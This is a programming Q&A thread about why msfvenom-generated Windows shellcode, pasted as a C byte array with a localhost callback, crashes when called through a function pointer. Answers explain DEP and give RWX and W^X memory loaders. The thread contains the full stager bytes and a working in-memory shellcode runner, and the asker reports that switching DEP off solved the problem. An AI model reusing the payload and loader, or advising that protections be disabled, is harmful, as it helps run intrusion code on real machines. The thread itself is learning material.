
I recently got interested in Metasploit, and I was trying to execute some shellcode from C code.

So I generated a shellcode with msfvenom for LHOST = 127.0.0.1 and LPORT = 714 (so if you want to run the shellcode, no problem, because it's localhost) and selected the C output format.

Then I found this: http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/ and this: http://www.sevagas.com/?Hide-meterpreter-shellcode-in-executable

So what I did:

#include <stdio.h>

/* msfvenom output in C format. The array is a plain global, so the linker
 * places it in a data section, not in the executable .text section. The
 * bytes 7f 00 00 01 (127.0.0.1) and 02 ca (port 714) are visible in it. */
char code[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\x7f\x00\x00\x01\x68\x02"
"\x00\x02\xca\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58"
"\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
"\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3";

int main(int argc, char **argv) {
    int(*func) ();                  /* pointer to a function taking no args, returning int */
    func = (int(*) ()) code;        /* point it at the data array */
    (int)(*func) ();                /* jump into the array: faults when the page is not executable */
    return 0;
}

Compiled it, launched it... and it crashed:

Unhandled exception at 0x00338000 in Shellcode.exe: 0xC0000005: Access violation while executing location 0x00338000.

The crash happens here: (int)(*func) ();

As I don't really understand what the program is trying to do (I'm quite new to C), I don't know where the problem comes from. Is it my shellcode or is it the way it is called?

And does someone have some documentation about executing shellcode in C/C++? Thanks all for your help.

Muhammad Shahzad
Survivor
  • 1) There is no language "C/C++", only the two **different** languages C and C++! 2) This is apparently C. 3) You invoke **undefined** behaviour. 4) See [ask], this is no "explain the code" site. – too honest for this site Sep 03 '16 at 15:26
  • 1
    "As I don't really understand what's the program is trying to do (I'm quite new to C), " - might it worth to first learn the C language? – Serge Sep 03 '16 at 15:28
  • 2
    So you are trying to hack a language you don't understand? – Weather Vane Sep 03 '16 at 15:28
  • @Olaf, 1) I know that there are 2 different languages, and I accept answers in either of them. 2) Yeah, it is. 3) The last line invokes undefined behavior, is that it? 4) Alright, thank you, I will check this. – Survivor Sep 03 '16 at 15:39
  • @Serge I have the basics, and usually to learn I start from a piece of code I don't understand and I try to reproduce it / improve it while learning. And it's something I've never tried before. – Survivor Sep 03 '16 at 15:41
  • @Weather Vane What do you mean by hacking? I'm trying to make something work without really understanding it, actually, which is very interesting because I'm discovering new things. – Survivor Sep 03 '16 at 15:43
  • @Survivor how can you mention Metasploit but not know what a hack is? I guess once you have your hack working with the code in the executable, your next step will be to try to apply said code externally, as program runtime input. – Weather Vane Sep 03 '16 at 16:14
  • OK, what if there is a `system("format C:")` call hidden in this program you don't understand? (or any other equivalent in terms of consequences that is valid for your system) – Serge Sep 03 '16 at 18:46

2 Answers


You are getting a segmentation fault because the memory is not marked as executable.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* assumes the `char code[] = "..."` array from the question is defined above */

int main(void)
{
    void *buf;

    /* copy code to an executable buffer: anonymous mapping with RWX permissions */
    buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_ANON,-1,0);
    if (buf == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy (buf, code, sizeof(code));

    /* run code */
    int i = ((int (*) (void))buf)();
    printf("Return value [%d]\n", i);
    return 0;
}
4pie0

The bytes represent machine instructions. On ordinary machines, memory is divided into different segments, and this code will typically go in a data segment. The call:

int(*func) ();
func = (int(*) ()) code;
(int)(*func) ();

tries to execute the code contained in these bytes.

However, modern operating systems usually provide, by default, a protection against executing code located in memory segments not designed for code execution (see here for example). You have to configure your compiler to disable it.

md5
  • Thank you for your answer, I cannot upvote yet.. So this call is modifying the stack, correct? I already disabled some security in VS2013 with the /GS- option, but it seems that's not enough. I'll read your Wikipedia article and come back. – Survivor Sep 03 '16 at 15:50
  • 1) C does not require a stack 2) static variables are typically **not** stored on the stack. 3) That wild casting invokes UB, i.e. it is not defined by the C language – too honest for this site Sep 03 '16 at 15:54
  • @Olaf: Thanks for 2), I missed the storage duration of `code` indeed. ;) As for 1), you won't bring an interesting answer whenever you stick only to the C standard here. – md5 Sep 03 '16 at 16:00
  • 1) How does it work if there is no stack? 2) I've heard about different sections (data, text, ...); is there a "link" between this and the stack and the static variables, or is it totally off-topic? – Survivor Sep 03 '16 at 16:00
  • EDIT: Just disabled DEP, and it seems to work.. Thank you so much, I'm going to keep learning about these protections and C and everything you spoke about in this discussion – Survivor Sep 03 '16 at 16:03
  • @md5: There is absolutely no need to bring up implementation details like stack/heap/data-segment/whatever here. Such questions can very well be answered sticking to the language. The fact that an actual implementation just crashes or segfaults with an appropriate message is of no relevance here. – too honest for this site Sep 03 '16 at 16:03
  • @Olaf: Well I'm waiting for your answer then. The purpose of shellcodes is to go into these implementation details. If you only invoke undefined behavior, of course it will be correct, but it won't help. – md5 Sep 03 '16 at 16:06
  • @Survivor: To address a comment, use `@name`. That said: You have to differentiate between the standard and a specific implementation. Your question can be answered without going into implementation details. There is a lot to be found about compiler construction and how they work. I'd recommend doing research on your own; an explanation is clearly OT here. – too honest for this site Sep 03 '16 at 16:06
  • @md5: Such code is no way meant to work on a proper system! Opposite, every sane OS tries to inhibit such exploits. And it is that construct which invokes UB, not me ... – too honest for this site Sep 03 '16 at 16:08
  • @Olaf OKAYYY I suppose I've understood why it wasn't working. Tell me if I'm wrong. My shellcode was stored in the exe file as a string, so not in the section which holds the "executable code" (.text, right?). Because there are protections, the shellcode wasn't allowed to be executed, or to be added to the "operation list" (the stack?) (I suppose I said it in "incorrect words" but that's the idea?) – Survivor Sep 03 '16 at 16:08
  • @Survivor: Basically that's what might have happened. (Alternatively that code could have generated just that message by chance.) But you missed the actual point: your code is not compliant C code, thus invokes UB, thus anything can happen. Be happy your OS apparently caught that code and reported appropriately. But that is nothing you should rely on. – too honest for this site Sep 03 '16 at 16:11
  • Why has someone down-voted the answer? It helped me and corrected my problem (so it's the solution) – Survivor Sep 03 '16 at 16:11
  • @Olaf: I don't understand your point. Such code is not portable, those are machine instructions! It is designed to work only on very specific implementations. Of course, this is not production code! Your explanation with UB is correct, but I believe it doesn't completely answer the OP's question. Language lawyers sometimes reach their limits... – md5 Sep 03 '16 at 16:16
  • @Olaf: **Google-translated compliant** I suppose I'm not "skilled" (missing the right word) enough in C to understand how to write "C compliant code", but let's hope that it will keep working until I understand ^^. Can the behavior change from one execution to another with UB? – Survivor Sep 03 '16 at 16:19
  • @Survivor if the behaviour was fixed from one execution to another then it would be defined, and it isn't, so YES. Please [see this](http://stackoverflow.com/questions/7961067/how-undefined-is-undefined-behavior). – Weather Vane Sep 03 '16 at 16:25
  • @Weather Vane Thank you for your answer and your link – Survivor Sep 03 '16 at 16:55
  • @WeatherVane I understand the content of what you sent. In their case, it's UB because they create a pointer (without initialization) and try to modify the value pointed to; but it can be anything because we don't know what the pointer is pointing at, so it will probably crash the program. Is that correct? The problem in my code is that I don't understand syntax like "int(*func) ();" so I don't exactly know what can cause UB. But don't worry, I'm actually googling to find out what this syntax means :) It's about function pointers (that's what my first search says) – Survivor Sep 03 '16 at 17:04
  • From what I just discovered: "int(*func) ();" creates a function pointer called func with no args. – Survivor Sep 03 '16 at 17:07
  • And "func = (int(*) ()) code;" well.... I suppose this: http://stackoverflow.com/questions/21951381/what-does-int-ret-intcode-mean will help me – Survivor Sep 03 '16 at 17:11
  • @Survivor: How about first learning to walk before trying to run? First write correct code before starting to research what background a specific undefined behaviour has. Picking some suspicious code from the internet and trying to understand it is a very bad approach - especially for learning C. – too honest for this site Sep 03 '16 at 17:56
  • @Olaf: Thanks for your answer. What do you mean by "correct code"? What approach do you recommend? – too honest for this site's question answered by Survivor Sep 03 '16 at 18:25
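Both answers make the same point: the array lives in a page the OS refuses to execute, and the question settled it by switching DEP off for the whole process. The program below is an added example, not code from the question or from either answer. It does what the two answers describe without weakening the process: it allocates a page read-write, copies the bytes in, then flips the page to read-execute before calling it (never writable and executable at the same time), using VirtualAlloc/VirtualProtect on Windows, which is what the VS2013 build in the question needs, and mmap/mprotect elsewhere. The bytes are a constructed "mov eax, 42 ; ret" stub standing in for the msfvenom output, so nothing connects to 127.0.0.1:714 and the result can be checked. The second function reproduces the question's crash on purpose: it calls the same bytes from a page without execute permission and catches the resulting fault (0xC0000005 on Windows, SIGSEGV or SIGBUS on POSIX). The architectures covered (x86, x86-64, AArch64) and the signal mapping are assumptions of this example.

```c
#define _GNU_SOURCE 1            /* sigaction, sigsetjmp, MAP_ANONYMOUS on glibc */
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <signal.h>
#include <setjmp.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS MAP_ANON   /* BSD/macOS spelling */
#endif
#endif

/* Constructed stand-in for the msfvenom bytes: "mov eax, 42 ; ret" (x86) or
 * "mov w0, #42 ; ret" (AArch64). Assumption: the build targets one of these. */
#if defined(__x86_64__) || defined(_M_X64) || defined(__i386__) || defined(_M_IX86)
static const unsigned char stub[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };
#elif defined(__aarch64__) || defined(_M_ARM64)
static const unsigned char stub[] = { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 };
#else
#error "no constructed stub for this architecture"
#endif

typedef int (*code_fn)(void);

/* Copy `len` bytes into a fresh page, change it from RW to RX, call it and
 * return what it returns. -1 if allocation or the protection change fails. */
int run_code(const unsigned char *code, size_t len)
{
    int ret = -1;
#ifdef _WIN32
    DWORD old;
    void *buf = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (buf == NULL)
        return -1;
    memcpy(buf, code, len);
    if (VirtualProtect(buf, len, PAGE_EXECUTE_READ, &old)) {
        FlushInstructionCache(GetCurrentProcess(), buf, len);
        ret = ((code_fn)buf)();
    }
    VirtualFree(buf, 0, MEM_RELEASE);
#else
    void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return -1;
    memcpy(buf, code, len);
    if (mprotect(buf, len, PROT_READ | PROT_EXEC) == 0) {
        __builtin___clear_cache((char *)buf, (char *)buf + len); /* AArch64 icache */
        ret = ((code_fn)buf)();
    }
    munmap(buf, len);
#endif
    return ret;
}

#ifndef _WIN32
static sigjmp_buf fault_jmp;
static void on_fault(int sig) { (void)sig; siglongjmp(fault_jmp, 1); }

/* The question's crash, reproduced on purpose: call bytes that sit in a page
 * without PROT_EXEC. With DEP/NX on, the CPU faults before the first byte
 * runs. Returns 1 if the fault fired, 0 if the bytes ran anyway, -1 on error. */
int faults_without_exec(const unsigned char *code, size_t len)
{
    struct sigaction sa, old_segv, old_bus;
    int faulted = 0;
    void *buf = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return -1;
    memcpy(buf, code, len);

    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);   /* macOS reports the fault as SIGBUS */

    if (sigsetjmp(fault_jmp, 1) == 0)
        ((code_fn)buf)();               /* same as the question's (*func)() */
    else
        faulted = 1;

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    munmap(buf, len);
    return faulted;
}
#endif

int main(void)
{
    printf("RX page: run_code returned %d\n", run_code(stub, sizeof stub));
#ifndef _WIN32
    printf("RW page: fault caught = %d\n", faults_without_exec(stub, sizeof stub));
#endif
    return 0;
}
```

Build with `cl run_code.c` (MSVC) or `cc run_code.c` (GCC/clang) and leave DEP and /GS at their defaults; neither needs to be turned off, because the page that is executed was requested as executable. Replacing the stub with the msfvenom array changes nothing in the two functions, except that the real payload does not return, so the printed value would never appear.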